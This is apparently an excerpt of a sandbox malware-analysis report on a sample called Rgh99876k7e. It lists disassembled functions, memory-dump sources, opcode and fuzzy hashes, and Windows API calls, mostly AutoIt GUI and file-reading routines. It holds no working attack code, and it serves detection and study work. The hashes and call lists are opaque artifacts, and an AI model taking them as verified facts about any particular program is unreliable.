                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d560d2131baa7f3e671f95e49c55aedee1e28c7966a6281fabaf447ee02d8639
                          • Instruction ID: 58ab2b403b317675b5b269d2bcd297ab9d548e2c7c08a8edbd9077277ce9e2f4
                          • Opcode Fuzzy Hash: d560d2131baa7f3e671f95e49c55aedee1e28c7966a6281fabaf447ee02d8639
                          • Instruction Fuzzy Hash: A502B5B0E00205EFDB04DF64D885AAEB7F1FF44310F118169E9169B2D1EB39EA54CB91
                          Function 00721C77 Relevance: .3, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                          • Instruction ID: 9e92e5e231fd5340c43ea086814f31d730e69c3155d06a0e70a2c8fdb5d3f7ba
                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                          • Instruction Fuzzy Hash: E99189726090F34ADB29463EA57403EFFE17A623A235A079DD4F2CB1C5FE28D954D620
                          Function 007219B0 Relevance: .2, Instructions: 240COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                          • Instruction ID: 90f2874333acf5bd2a1fbb827fbe6dbfdf70eb9bcaa6ace4aaad94c20f467a56
                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                          • Instruction Fuzzy Hash: D19156722090F34EDB2D467AA57403DFFF16AA23A139A47AED4F2CA1C1FD28D554D620
                          Function 00727A4A Relevance: .2, Instructions: 237COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d5c6d8d4cde9b076fced345da3ed7dc163980f80be900d0e73b338a8748e79dd
                          • Instruction ID: 3d3f022a019d6df7ebd77cd6229e76a38abb47d207232bcdc07625e057a0a8c7
                          • Opcode Fuzzy Hash: d5c6d8d4cde9b076fced345da3ed7dc163980f80be900d0e73b338a8748e79dd
                          • Instruction Fuzzy Hash: 35616DB120877597DF3C592CBF95BBE23A8DF41710F14491DE842DB281D51D9E81C366
                          Function 00727CA7 Relevance: .2, Instructions: 237COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 511598f748292f9402bae3e4fb82f84f6e1e33f85692b9c35e32222677f4e0fe
                          • Instruction ID: e6b734315dd8e2902d8fd282118954adbe63482a8e9fef535086cd64f0bfef7e
                          • Opcode Fuzzy Hash: 511598f748292f9402bae3e4fb82f84f6e1e33f85692b9c35e32222677f4e0fe
                          • Instruction Fuzzy Hash: 3F618B75B0873997DE3C4A287B55BBF2394EF42700F10095EE842DB281DA1EAD42C266
                          Function 00721706 Relevance: .2, Instructions: 232COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                          • Instruction ID: 311e3a80d7cf7b6cf34c321ec8613f82ab228fab317144c951525ed5c77d4272
                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                          • Instruction Fuzzy Hash: 938176726090F34ADB6D423A957443EFFE17AA23B135A07ADD4F2CB1C1EE28D654D620
                          Function 02533610 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction ID: 4c78d8178ffb98a353917ad1f5b4d618e47248b3004970923769fbdedff84bfb
                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction Fuzzy Hash: B841B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                          Function 02533500 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction ID: 337fdeb947f181310a1b0b63180bc764287131a7ad05bf7ec5b7171b1a25fc9b
                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction Fuzzy Hash: E2019279A05109EFCB45DF98C5909AEFBB5FB88310F2085D9D819A7701E730AE51DB84
                          Function 025334A0 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction ID: fc18f8873ed3e2e0c402a09c971364e6714c25b9ff9c9861b6eaa009200c5a8b
                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction Fuzzy Hash: 94019278A04209EFCB45DF98C5949AEF7B5FB88310F2085D9D819A7701E730AE41DB94
                          Function 02531E6E Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
                          • Instruction ID: 12cbbee2ad97ca28ebd479973cedbf0f86dc4bb29c9604106d163cb5d8cfbbc3
                          • Opcode Fuzzy Hash: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
                          • Instruction Fuzzy Hash: F6C08C300453C89ADB028759E08C7407BEDAB0AA18F1400E4D8080BA02C3A96A048A45
                          Function 02531E80 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                          Function 00782ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00782B30
                          • DeleteObject.GDI32(00000000), ref: 00782B43
                          • DestroyWindow.USER32 ref: 00782B52
                          • GetDesktopWindow.USER32 ref: 00782B6D
                          • GetWindowRect.USER32(00000000), ref: 00782B74
                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00782CA3
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00782CB1
                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782CF8
                          • GetClientRect.USER32(00000000,?), ref: 00782D04
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00782D40
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D62
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D75
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D80
                          • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D89
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D98
                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DA1
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DA8
                          • GlobalFree.KERNEL32(00000000), ref: 00782DB3
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DC5
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0079FC38,00000000), ref: 00782DDB
                          • GlobalFree.KERNEL32(00000000), ref: 00782DEB
                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00782E11
                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00782E30
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782E52
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078303F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          • Opcode ID: 4c25efc3439d027a08ec68ebdb2c82ab6cab3d2b127d1ff3a31e6c967418cf19
                          • Instruction ID: ae79f387ba1d755d0cfbec3f85f8c3bd469552c3a74df14bfc4b1d02c544d31c
                          • Opcode Fuzzy Hash: 4c25efc3439d027a08ec68ebdb2c82ab6cab3d2b127d1ff3a31e6c967418cf19
                          • Instruction Fuzzy Hash: 7B027E71900204EFDB15DFA4CC89EAE7BB9FF48715F008159F915AB2A1DB78AD02CB64
                          Function 007970D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 0079712F
                          • GetSysColorBrush.USER32(0000000F), ref: 00797160
                          • GetSysColor.USER32(0000000F), ref: 0079716C
                          • SetBkColor.GDI32(?,000000FF), ref: 00797186
                          • SelectObject.GDI32(?,?), ref: 00797195
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007971C0
                          • GetSysColor.USER32(00000010), ref: 007971C8
                          • CreateSolidBrush.GDI32(00000000), ref: 007971CF
                          • FrameRect.USER32(?,?,00000000), ref: 007971DE
                          • DeleteObject.GDI32(00000000), ref: 007971E5
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00797230
                          • FillRect.USER32(?,?,?), ref: 00797262
                          • GetWindowLongW.USER32(?,000000F0), ref: 00797284
                            • Part of subcall function 007973E8: GetSysColor.USER32(00000012), ref: 00797421
                            • Part of subcall function 007973E8: SetTextColor.GDI32(?,?), ref: 00797425
                            • Part of subcall function 007973E8: GetSysColorBrush.USER32(0000000F), ref: 0079743B
                            • Part of subcall function 007973E8: GetSysColor.USER32(0000000F), ref: 00797446
                            • Part of subcall function 007973E8: GetSysColor.USER32(00000011), ref: 00797463
                            • Part of subcall function 007973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00797471
                            • Part of subcall function 007973E8: SelectObject.GDI32(?,00000000), ref: 00797482
                            • Part of subcall function 007973E8: SetBkColor.GDI32(?,00000000), ref: 0079748B
                            • Part of subcall function 007973E8: SelectObject.GDI32(?,?), ref: 00797498
                            • Part of subcall function 007973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007974B7
                            • Part of subcall function 007973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007974CE
                            • Part of subcall function 007973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007974DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                          • String ID:
                          • API String ID: 4124339563-0
                          • Opcode ID: 9c28bded8f5717b88ee2b3f53798b6e949181580000b7acd66f0af1534463561
                          • Instruction ID: b344b4b66680d151031df0f73913cd2bc26e6ff2b6361f9b583a27f5decda50c
                          • Opcode Fuzzy Hash: 9c28bded8f5717b88ee2b3f53798b6e949181580000b7acd66f0af1534463561
                          • Instruction Fuzzy Hash: 44A1BF72018305EFDF069F64EC48A6B7BB9FF88320F104A1AF962961E1D738E945CB55
                          Function 00718D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?), ref: 00718E14
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00756AC5
                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00756AFE
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00756F43
                            • Part of subcall function 00718F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00718BE8,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718FC5
                          • SendMessageW.USER32(?,00001053), ref: 00756F7F
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00756F96
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00756FAC
                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00756FB7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                          • String ID: 0
                          • API String ID: 2760611726-4108050209
                          • Opcode ID: e1c9e46a47394e0047ab696072fa383ac8e7700f5853f4d226a94a96a7f2ee39
                          • Instruction ID: 893f710157cf98e5a606125bff6b5704404e39c6e1d6f860f1e4c991e740cabe
                          • Opcode Fuzzy Hash: e1c9e46a47394e0047ab696072fa383ac8e7700f5853f4d226a94a96a7f2ee39
                          • Instruction Fuzzy Hash: 2C12C170601241EFDB25CF28C854BE5B7F1FB45302F948469F8858B2A1CB79EC9ACB91
                          Function 00782711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 0078273E
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0078286A
                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007828A9
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007828B9
                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00782900
                          • GetClientRect.USER32(00000000,?), ref: 0078290C
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00782955
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00782964
                          • GetStockObject.GDI32(00000011), ref: 00782974
                          • SelectObject.GDI32(00000000,00000000), ref: 00782978
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00782988
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00782991
                          • DeleteDC.GDI32(00000000), ref: 0078299A
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007829C6
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 007829DD
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00782A1D
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00782A31
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00782A42
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00782A77
                          • GetStockObject.GDI32(00000011), ref: 00782A82
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00782A8D
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00782A97
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: 31a38660a15cb58638a59bf39fe8f93d5262362d0cb8aee0e21cea4945aaf31a
                          • Instruction ID: 832600789a0975322ede65570ea71c65c5f9dd17dd9df425e40f551ce601c11f
                          • Opcode Fuzzy Hash: 31a38660a15cb58638a59bf39fe8f93d5262362d0cb8aee0e21cea4945aaf31a
                          • Instruction Fuzzy Hash: 70B15BB1A40205BFEB14DFA8DC49EAE7BB9EB08711F008115FA15E72D1D778AD41CBA4
                          Function 00774ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00774AED
                          • GetDriveTypeW.KERNEL32(?,0079CB68,?,\\.\,0079CC08), ref: 00774BCA
                          • SetErrorMode.KERNEL32(00000000,0079CB68,?,\\.\,0079CC08), ref: 00774D36
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: d08352333028dab6b4e0b3cf336cc7e91b56bea43c5fbc8cd213e0081b3f1c80
                          • Instruction ID: 09d7111138d36ef658c7258f6089b370be6a6a9d6f2c87a2a59a1ade79b7f7b7
                          • Opcode Fuzzy Hash: d08352333028dab6b4e0b3cf336cc7e91b56bea43c5fbc8cd213e0081b3f1c80
                          • Instruction Fuzzy Hash: 7261ADB1705105DBCF15DB28CAD6E69B7F0AB04380B24C52DE80AAB692DB3DED41DB61
                          Function 007973E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00797421
                          • SetTextColor.GDI32(?,?), ref: 00797425
                          • GetSysColorBrush.USER32(0000000F), ref: 0079743B
                          • GetSysColor.USER32(0000000F), ref: 00797446
                          • CreateSolidBrush.GDI32(?), ref: 0079744B
                          • GetSysColor.USER32(00000011), ref: 00797463
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00797471
                          • SelectObject.GDI32(?,00000000), ref: 00797482
                          • SetBkColor.GDI32(?,00000000), ref: 0079748B
                          • SelectObject.GDI32(?,?), ref: 00797498
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007974B7
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007974CE
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 007974DB
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079752A
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00797554
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00797572
                          • DrawFocusRect.USER32(?,?), ref: 0079757D
                          • GetSysColor.USER32(00000011), ref: 0079758E
                          • SetTextColor.GDI32(?,00000000), ref: 00797596
                          • DrawTextW.USER32(?,007970F5,000000FF,?,00000000), ref: 007975A8
                          • SelectObject.GDI32(?,?), ref: 007975BF
                          • DeleteObject.GDI32(?), ref: 007975CA
                          • SelectObject.GDI32(?,?), ref: 007975D0
                          • DeleteObject.GDI32(?), ref: 007975D5
